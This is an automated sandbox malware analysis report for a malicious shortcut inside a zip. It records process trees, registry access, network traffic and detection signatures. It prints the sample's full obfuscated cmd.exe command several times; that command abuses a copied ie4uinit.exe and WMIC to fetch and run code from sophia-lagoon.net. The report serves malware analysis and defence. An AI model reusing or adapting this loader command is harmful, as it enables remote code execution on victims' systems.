Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Sample Name:Education and Experience.lnk(1).zip
Analysis ID:16737
MD5:254c94d8e782c1e10fd3021b56638bc7
SHA1:cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Very long command line found
Creates processes via WMI
Contains functionality to create processes via WMI
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64_ra
  • cmd.exe (PID: 6460 cmdline: "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn MD5: 9D59442313565C2E0860B88BF32B2277)
    • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 9D59442313565C2E0860B88BF32B2277)
      • xcopy.exe (PID: 6548 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: F359375C36D2C540DFF1141B11BF2F7F)
    • cmd.exe (PID: 6532 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation " MD5: 9D59442313565C2E0860B88BF32B2277)
    • cmd.exe (PID: 6572 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 9D59442313565C2E0860B88BF32B2277)
      • WMIC.exe (PID: 6604 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: 29B7D02A3B5F670B5AF2DAF008810863)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn" MD5: 9D59442313565C2E0860B88BF32B2277)
  • ie4uinit.exe (PID: 6680 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: AD9AD3C852D59FBF125F02A09F1FF405)
    • ie4uinit.exe (PID: 6712 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: AD9AD3C852D59FBF125F02A09F1FF405)
      • rundll32.exe (PID: 6764 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: F68AF942FD7CCC0E7BAB1A2335D2AD26)
  • ie4uinit.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • ie4uinit.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • ie4uinit.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: global trafficHTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.drString found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: unknownDNS traffic detected: queries for: sophia-lagoon.net
Source: global trafficHTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive

System Summary

barindex
Very long command line found
Source: unknownProcess created: Commandline size = 2790
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile deleted: C:\Windows\Temp\OLDF396.tmpJump to behavior
Source: C:\Windows\System32\xcopy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
